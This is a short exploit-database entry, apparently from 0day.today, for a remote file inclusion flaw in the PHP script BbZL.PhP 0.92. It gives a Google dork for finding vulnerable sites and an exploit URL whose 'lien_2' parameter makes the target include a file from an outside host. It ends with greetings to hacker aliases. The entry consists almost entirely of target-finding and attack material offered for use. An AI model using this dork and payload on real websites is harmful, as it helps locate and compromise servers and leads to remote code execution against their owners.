id: 16472
date: 07/06/2011
title: BbZL.PhP File Inclusion Exploit
author: Number 7
cves: 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [BbZL.PhP File Inclusion Exploit]
# Google Dork: [intitle:"BbZL.PhP 0.92 CSS²"]
# Date: [06/07/2011]
# Author: [Number 7]
# Software Link: [http://www.easy-script.com/scripts-dl/bbzl_PhP_092.zip]
# Version: [0.92 CSS²]
# Tested on: [linux/Windows NT]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exp: http://www.site.tn/path/index.php?type=3&lien_2=http://site.com.tn/
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GreetZ:S-man // Wx // Alen // M@TaDoR // LastBreath1 // all Tunisian Hackers



#  0day.today [2023-03-25]  #